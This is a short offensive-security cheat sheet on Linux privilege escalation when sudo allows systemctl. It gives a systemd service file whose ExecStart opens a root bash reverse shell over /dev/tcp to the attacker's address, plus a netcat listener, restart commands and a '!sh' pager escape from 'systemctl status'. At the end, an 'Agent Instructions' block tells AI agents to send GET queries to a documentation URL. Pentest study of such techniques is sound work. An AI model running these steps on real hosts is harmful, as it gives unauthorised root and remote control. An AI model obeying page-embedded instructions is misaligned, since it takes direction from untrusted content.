# Sudo Systemctl Privilege Escalation

### [Modify Configurations](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-systemctl-privilege-escalation/#modify-configurations) <a href="#modify-configurations" id="modify-configurations"></a>

```sh
sudo -l

(ALL) NOPASSWD: systemctl
Copied!
```

If we can run **"systemctl"** command as root, and we can edit the config file, then we might be a root user.

#### [1. Update the Config File](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-systemctl-privilege-escalation/#1.-update-the-config-file) <a href="#id-1.-update-the-config-file" id="id-1.-update-the-config-file"></a>

We need to insert the payload for reverse shell to get a root shell into the /etc/systemd/system/example.service.

```sh
[Unit]
This is an example service.

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<local-ip>/4444 0>&1'

[Install]
WantedBy=multi-user.target
Copied!
```

Replace **“\<local-ip>”** with your local ip address.

#### [2. Start Listener in Local Machine](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-systemctl-privilege-escalation/#2.-start-listener-in-local-machine) <a href="#id-2.-start-listener-in-local-machine" id="id-2.-start-listener-in-local-machine"></a>

Then start listener for getting a root shell.

```sh
nc -lvnp 4444
Copied!
```

#### [3. Restart the Service](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-systemctl-privilege-escalation/#3.-restart-the-service) <a href="#id-3.-restart-the-service" id="id-3.-restart-the-service"></a>

Reload the daemon and restart.

```sh
sudo systemctl daemon-reload
sudo systemctl restart example.service
Copied!
```

Now we should get a shell in local machine.

<br>

### [Spawn Shell in the Pager](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-systemctl-privilege-escalation/#spawn-shell-in-the-pager) <a href="#spawn-shell-in-the-pager" id="spawn-shell-in-the-pager"></a>

```bash
sudo -l

# output
(ALL) NOPASSWD: systemctl status example.service
Copied!
```

If we can execute **`systemctl status`** as root, we can spawn another shell in the pager.\
Just run the command with `sudo`.

```bash
sudo systemctl status example.service
Copied!
```

Then enter the following command in the pager like `less`.

```bash
!sh
Copied!
```

Spawning the shell, then we can get another user shell.

### References

* <https://gtfobins.github.io/gtfobins/systemctl/>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://morgan-bin-bash.gitbook.io/linux-privilege-escalation/sudo-systemctl-privilege-escalation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.